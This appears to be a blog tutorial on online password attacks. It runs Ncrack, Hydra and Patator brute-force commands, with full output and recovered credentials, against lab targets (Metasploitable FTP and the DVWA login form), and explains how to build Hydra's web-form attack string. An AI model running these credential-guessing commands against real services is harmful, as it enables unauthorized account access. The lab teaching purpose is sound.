Online password attacks involve attacking services such as FTP, TELNET, SSH, or HTTP to try and guess a password. This type of attack differs from an offline attack in that in offline attacks, you have a hash and are only limited by the speed of your cracking machine, without communicating with the target. Online attacks are in constant communication with the target.
Because of this, online password attacks are extremely situational, and are very limited. The speed of the guesses can be affected by several your bandwidth, the target’s bandwidth, throttling the amount of guesses (tar pitting), account lockouts, and changing passwords. It’s also very loud and will surely be detected by an IDS.
Online brute force attacks that iterate over millions of passwords and usernames such as the rockyou.txt dictionary are impractical. Online attacks are much more effective with a smaller list containing the default/weak credentials.
In this post, I’ll use some popular tools used for cracking passwords over the wire.
To make things easier, I’ll use a small subset of the rockyou.txt wordlist, and make sure to insert the correct password in the list.
Ncrack is a very fast network authentication cracking tool, which is helpful for testing a large number of hosts for weak passwords.
In this case, I’ll audit our Metasploitable box for default easily cracked FTP credentials.
# ncrack -p 21 -user postgres -P shortlist.txt 192.168.238.137 Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2015-11-08 23:15 EST Discovered credentials for ftp on 192.168.238.137 21/tcp: 192.168.238.137 21/tcp ftp: 'postgres' 'postgres' Ncrack done: 1 service scanned in 30.01 seconds. Ncrack finished.
Hydra is another tool that can crack passwords over the network using a list of usernames and passwords.
# hydra -l postgres -P shortlist.txt 192.168.238.137 ftp Hydra (http://www.thc.org/thc-hydra) starting at 2015-12-12 22:45:10 [DATA] max 16 tasks per 1 server, overall 64 tasks, 102 login tries (l:1/p:102), ~0 tries per task [DATA] attacking service ftp on port 21 [ftp] host: 192.168.238.131 login: postgres password: postgres 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2015-12-12 22:45:13
Hydra can also be used as an online password cracker.
I will need some information about the web form before I can unleash Hydra on it, specifically:
- IP address/hostname
- HTTP request method (i.e. GET or POST)
- HTTP request parameters
- Success/failure responses
- Session cookies
- Presence of lockout features that may slow down our cracking attempt
- And, of course, a list of usernames and passwords.
For a username and password list, I rattled off the most popular usernames and passwords that came to mind.
For the host, I decided to crack the login form for the Damn Vulnerable Web App https://github.com/RandomStorm/DVWA
We can capture information about the HTTP requests and responses using OWASP, but I decided to use a Firefox browser addon called Tamper Data.
Navigating to http://192.168.238.132/login.php, and with Tamper Data running, I enter some data into the username and password fields.
# hydra -L usernames.txt -P shorterlist.txt 192.168.238.132 http-form-get "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=password incorrect:H=Cookie: security;high;PHPSESSID=4npusjem9f38v9ao60qq48idm7"
-L and -P will iterate through a file, while -l and -p should be used if a single username/password is supplied
I can tell it’s an HTTP GET method one of two ways: Viewing the source of the page will the form action is a GET. I can also see the GET request inside of Tamper Data.
The next string includes some arguments Hydra needs. The arguments are separated by a colon.
The first argument tells Hydra where the address of the login form
The second argument tells Hydra where the username, password, and any other parameters passed to the server
The third argument contains a string that we know will appear upon either a successful or a failed login. If Hydra sees this string in an HTTP response, it will assume the login information was correct.
I also needed the presence of a fourth optional argument. Inside of DWVA is the web form vulnerable to brute force. We are required to log in to DWVA to access this.
This is done with cookies. We can see these inside of Tamper Data. We are looking for the PHPSESSID cookie (See https://security.stackexchange.com/questions/37020/why-does-hydra-return-16-valid-passwords-when-none-are-valid )
Hydra (http://www.thc.org/thc-hydra) starting at 2015-12-12 22:26:43 [DATA] max 16 tasks per 1 server, overall 64 tasks, 64 login tries (l:4/p:16), ~0 tries per task [DATA] attacking service http-get-form on port 80 [http-get-form] host: 192.168.238.132 login: admin password: password [STATUS] 41.00 tries/min, 41 tries in 00:01h, 23 todo in 00:01h, 16 active [STATUS] 31.00 tries/min, 62 tries in 00:02h, 2 todo in 00:01h, 16 active 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2015-12-12 22:29:37
Medusa and Hydra do the same thing. Some people prefer Medusa, others Hydra. According to the author of Medusa, Medusa crashes less, more modular, and faster due to multithreading.
I think which tool you choose is completely your preference; but I prefer Hydra solely because that is what I learned how to use first.
Patator is a fast, multithreaded Python application supporting a lot of modules for different services.
$ ./patator.py ftp_login host=192.168.238.131 user=postgres password=FILE0 0=/usr/share/wordlists/shortlist.txt 15:29:01 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-12-13 15:29 EST 15:29:01 patator INFO - 15:29:01 patator INFO - code size time | candidate | num | mesg 15:29:01 patator INFO - ----------------------------------------------------------------------------- 15:29:01 patator INFO - 230 17 0.014 | postgres | 8 | Login successful. 15:29:04 patator INFO - 530 16 2.879 | 123456 | 1 | Login incorrect. 15:29:04 patator INFO - 530 16 2.869 | 12345 | 2 | Login incorrect. 15:29:04 patator INFO - 530 16 2.861 | 123456789 | 3 | Login incorrect. 15:29:04 patator INFO - 530 16 2.872 | password | 4 | Login incorrect. [omitted] 15:29:37 patator INFO - Hits/Done/Skip/Fail/Size: 102/102/0/0/102, Avg: 2 r/s, Time: 0h 0m 35s